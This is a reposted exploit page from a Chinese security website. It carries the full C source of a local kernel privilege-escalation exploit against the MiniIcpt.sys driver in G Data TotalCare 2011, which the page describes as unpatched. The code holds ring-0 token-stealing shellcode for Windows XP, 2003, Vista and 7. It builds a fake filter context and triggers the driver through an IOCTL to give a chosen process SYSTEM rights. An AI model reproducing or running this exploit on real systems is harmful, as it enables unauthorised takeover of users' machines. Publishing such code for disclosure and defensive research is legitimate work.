首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
G Data TotalCare 2011 0day Local Kernel Exploit
来源:CISS Research Team 作者:Tarakanov 发布时间:2010-11-09  

/*
# Exploit Title: G Data TotalCare 2011 0day Local Kernel Exploit
# Date: 2010-11-08
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link: http://www.gdata.de/
# Version: up to date, version 21.1.0.5, MiniIcpt.sys version 1.0.8.9
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/
#include <stdio.h>
#include "winsock2.h"
#include <windows.h>

#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "Ws2_32.lib")


static unsigned char win2k3_ring0_shell[] =
  /* _ring0 */
  "\xb8\x24\xf1\xdf\xff"
  "\x8b\x00"
  "\x8b\xb0\x18\x02\x00\x00"
  "\x89\xf0"
  /* _sys_eprocess_loop   */
  "\x8b\x98\x94\x00\x00\x00"
  "\x81\xfb\x04\x00\x00\x00"
  "\x74\x11"
  "\x8b\x80\x9c\x00\x00\x00"
  "\x2d\x98\x00\x00\x00"
  "\x39\xf0"
  "\x75\xe3"
  "\xeb\x21"
  /* _sys_eprocess_found  */
  "\x89\xc1"
  "\x89\xf0"

  /* _cmd_eprocess_loop   */
  "\x8b\x98\x94\x00\x00\x00"
  "\x81\xfb\x00\x00\x00\x00"
  "\x74\x10"
  "\x8b\x80\x9c\x00\x00\x00"
  "\x2d\x98\x00\x00\x00"
  "\x39\xf0"
  "\x75\xe3"
  /* _not_found           */
  "\xcc"
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* copy tokens!$%!      */
  "\x8b\x89\xd8\x00\x00\x00"
  "\x89\x88\xd8\x00\x00\x00"
  "\x90";

static unsigned char winvista_ring0_shell[] =
  /* _ring0 */
  "\x64\xa1\x24\x01\x00\x00"
  //"\x8b\x00"
  "\x8b\x70\x48"
  "\x89\xf0"
  /* _sys_eprocess_loop   */
  "\x8b\x98\x9c\x00\x00\x00"
  "\x81\xfb\x04\x00\x00\x00"
  "\x74\x11"
  "\x8b\x80\xa4\x00\x00\x00"
  "\x2d\xa0\x00\x00\x00"
  "\x39\xf0"
  "\x75\xe3"
  "\xeb\x21"
  /* _sys_eprocess_found  */
  "\x89\xc1"
  "\x89\xf0"

  /* _cmd_eprocess_loop   */
  "\x8b\x98\x9c\x00\x00\x00"
  "\x81\xfb\x00\x00\x00\x00"
  "\x74\x10"
  "\x8b\x80\xa4\x00\x00\x00"
  "\x2d\xa0\x00\x00\x00"
  "\x39\xf0"
  "\x75\xe3"
  /* _not_found           */
  "\xcc"
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* copy tokens!$%!      */
  "\x8b\x89\xe0\x00\x00\x00"
  "\x89\x88\xe0\x00\x00\x00"
  "\x90";


static unsigned char win7_ring0_shell[] =
  /* _ring0 */
  "\x64\xa1\x24\x01\x00\x00"
  "\x8b\x70\x50"
  "\x89\xf0"
  /* _sys_eprocess_loop   */
  "\x8b\x98\xb4\x00\x00\x00"
  "\x81\xfb\x04\x00\x00\x00"
  "\x74\x11"
  "\x8b\x80\xbc\x00\x00\x00"
  "\x2d\xb8\x00\x00\x00"
  "\x39\xf0"
  "\x75\xe3"
  "\xeb\x21"
  /* _sys_eprocess_found  */
  "\x89\xc1"
  "\x89\xf0"

  /* _cmd_eprocess_loop   */
  "\x8b\x98\xb4\x00\x00\x00"
  "\x81\xfb\x00\x00\x00\x00"
  "\x74\x10"
  "\x8b\x80\xbc\x00\x00\x00"
  "\x2d\xb8\x00\x00\x00"
  "\x39\xf0"
  "\x75\xe3"
  /* _not_found           */
  "\xcc"
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* copy tokens!$%!      */
  "\x8b\x89\xf8\x00\x00\x00"
  "\x89\x88\xf8\x00\x00\x00"
  "\x90";


static unsigned char winxp_ring0_shell[] =
  /* _ring0 */
  "\xb8\x24\xf1\xdf\xff"
  "\x8b\x00"
  "\x8b\x70\x44"
  "\x89\xf0"
  /* _sys_eprocess_loop   */
  "\x8b\x98\x84\x00\x00\x00"
  "\x81\xfb\x04\x00\x00\x00"
  "\x74\x11"
  "\x8b\x80\x8c\x00\x00\x00"
  "\x2d\x88\x00\x00\x00"
  "\x39\xf0"
  "\x75\xe3"
  "\xeb\x21"
  /* _sys_eprocess_found  */
  "\x89\xc1"
  "\x89\xf0"

  /* _cmd_eprocess_loop   */
  "\x8b\x98\x84\x00\x00\x00"
  "\x81\xfb\x00\x00\x00\x00"
  "\x74\x10"
  "\x8b\x80\x8c\x00\x00\x00"
  "\x2d\x88\x00\x00\x00"
  "\x39\xf0"
  "\x75\xe3"
  /* _not_found           */
  "\xcc"
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* copy tokens!$%!      */
  "\x8b\x89\xc8\x00\x00\x00"
  "\x89\x88\xc8\x00\x00\x00"
  "\x90";


static unsigned char freeze[] =
  "\xeb\xfe";// jmp $0

 

void craft_fake_flt_context(char* buff, LPVOID shellcode_addr)
{
 DWORD references = 1; 
 DWORD *Entry;

 Entry = (DWORD*)malloc(0x8);

 Entry[0] = Entry;//Entry[0] == esi
 Entry[1] = shellcode_addr;//[esi+4] - r0 shellcode

 memcpy(buff-0x4, &references, 0x4);
 memcpy(buff-0x28, Entry, 0x4);
}

static PCHAR fixup_ring0_shell (DWORD ppid, DWORD *zlen)
{
 DWORD dwVersion, dwMajorVersion, dwMinorVersion;

 dwVersion = GetVersion ();
 dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
 dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));

 printf("dwMajorVersion = %d dwMinorVersion %d\n", dwMajorVersion, dwMinorVersion);

 switch (dwMajorVersion)
 {
  case 5:
   switch (dwMinorVersion)
   {
    case 1:
     *zlen = sizeof winxp_ring0_shell - 1;
     *(PDWORD) &winxp_ring0_shell[55] = ppid;
     return (winxp_ring0_shell);

    case 2:
     *zlen = sizeof win2k3_ring0_shell - 1;
     *(PDWORD) &win2k3_ring0_shell[58] = ppid;
     return (win2k3_ring0_shell);

    default:
     printf("GetVersion, unsupported version\n");
     exit(EXIT_FAILURE);
   }

  case 6:
   switch (dwMinorVersion)
   {
    case 0:
     *zlen = sizeof winvista_ring0_shell - 1;
     *(PDWORD) &winvista_ring0_shell[54] = ppid;
     return (winvista_ring0_shell);

    case 1:
     *zlen = sizeof win7_ring0_shell - 1;
     *(PDWORD) &win7_ring0_shell[54] = ppid;
     return (win7_ring0_shell);

    default:
     printf("GetVersion, unsupported version\n");
     exit(EXIT_FAILURE);
   }

  default:
   printf("GetVersion, unsupported version\n");
   exit(EXIT_FAILURE);
 }

 return (NULL);
}


int main(int argc, char **argv)
{
 HANDLE   hDevice, hThread;
 char *inbuff, *inbuffer;
 DWORD *buff;
 DWORD ioctl = 0x83170180, in = 0xC, out = 0x0C, len, zlen, ppid;
 LPVOID zpage, zbuf;

 printf ("G Data TotalCare 2011 0day Local Kernel Exploit\n"
    "by: Nikita Tarakanov (CISS Research Team)\n");


 if (argc <= 1)
 {
  printf("Usage: %s <processid to elevate>\n", argv[0]);
  return 0;
 }

 ppid = atoi(argv[1]);

 zpage = VirtualAlloc(NULL, 0x1000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 if (zpage == NULL)
 {
  printf("VirtualAlloc failed\n");
  return 0;
 }
 printf("Ring 0 shellcode at 0x%08X address\n", zpage, 0x10000);

 memset(zpage, 0xCC, 0x1000);
 zbuf = fixup_ring0_shell(ppid, &zlen);
 memcpy((PCHAR)zpage, (PCHAR)zbuf, zlen);
 memcpy((PCHAR)zpage + zlen, (PCHAR)freeze, sizeof (freeze) - 1);

 
 if ( (hDevice = CreateFileA("\\\\.\\MiniIcptControlDevice0",
        GENERIC_READ|GENERIC_WRITE,
        0,
        0,
        OPEN_EXISTING,
        0,
        NULL) ) != INVALID_HANDLE_VALUE )
 {
  printf("Device succesfully opened!\n");
 }
 else
 {
  printf("Error: Error opening device \n");
  return 0;
 } 
 
 inbuff = (char *)malloc(0x1000);
 memset(inbuff, 0x90, 0x1000);
 buff = (DWORD *)malloc(0x1000);
 if(!inbuff){
  printf("malloc failed!\n");
  return 0;
 }

 
 inbuffer = inbuff + 0x40;
 printf("crafting\n");
 craft_fake_flt_context(inbuffer, zpage);
 printf("deviceio!\n");
 buff[0] = inbuffer;

 DeviceIoControl(hDevice, ioctl, buff, in, buff, out, &len, NULL);
 free(inbuff);

 return 0;

}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PCSX2 0.9.7 beta Binary Denial
·Novell Groupwise Internet Agen
·DeluxeBB versions 1.3 and belo
·Novell Groupwise Internet Agen
·WordPress Database Interface T
·Woltlab Burning Board Userloca
·Android versions 2.0 and 2.1 r
·Oracle MySQL < 5.1.49 'WITH RO
·DeluxeBB <= 1.3 Private Info D
·IBM OmniFind CSRF Vulnerabilit
·ProFTPD IAC Remote Root Exploi
·IBM OmniFind Buffer Overflow V
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved